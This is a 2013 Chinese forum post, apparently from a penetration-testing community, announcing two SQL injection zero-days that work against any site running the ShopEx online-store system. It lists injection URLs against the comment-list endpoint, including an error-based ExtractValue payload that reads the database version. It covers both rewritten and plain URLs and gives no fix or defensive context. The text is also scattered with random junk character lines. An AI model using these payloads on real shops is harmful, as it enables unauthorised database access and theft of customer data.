中国网络渗透测试联盟
标题:
shopex通杀注入0day漏洞两处
[打印本页]
作者:
admin
时间:
2013-2-19 08:31
标题:
shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
! J- f: M" {# w7 Y0 }' _: V
) N; N9 ^. J% j8 K* l& L& O4 t
好吧,我扯远了~~
7 q% g7 ?2 @# V9 P! L0 ^7 ?
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
3 }0 m: ?% ~: Y$ F' n* Y
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
" n$ L4 w! l& N {
; G6 Q S, S$ m+ i9 j
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
5 o! u+ e( d8 B7 ^3 O, `$ h
* W* e: h2 b: K% ]9 t( q
http://www.x.com/comment-8967
′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
( H* f7 E* ? w* M, R3 F8 x3 C
' { ^3 D6 N# j/ ~
http://www.x.cn/index.php?comment-822
′/**/and/**/’1′=’1-ask-commentlist.html
1 Q8 w1 a* M1 N9 i
1 w% ]3 N8 E' F/ L; M
http://demo.x.com.cn/485/index.php?comment-190
′/**/and/**/’1′=’1-ask-commentlist.html
a- f0 u5 C) M- r- F% ~/ ^/ @) d
! D1 m1 m5 D' V5 @7 [
9 f i' ~ ?- C$ w+ E |, q0 n
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
8 h" h/ h* G1 E. ]
如何注入就不多说了,10多年的东西了…不会也会了…
9 Q+ s4 C/ x6 y T3 Z, o
" D' [4 j1 F5 Q6 l+ {
5 g5 \# U. T* I0 N. G
& {1 U8 q9 b1 O% w i2 S9 L
- h1 A2 Z9 p" f+ j5 K
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2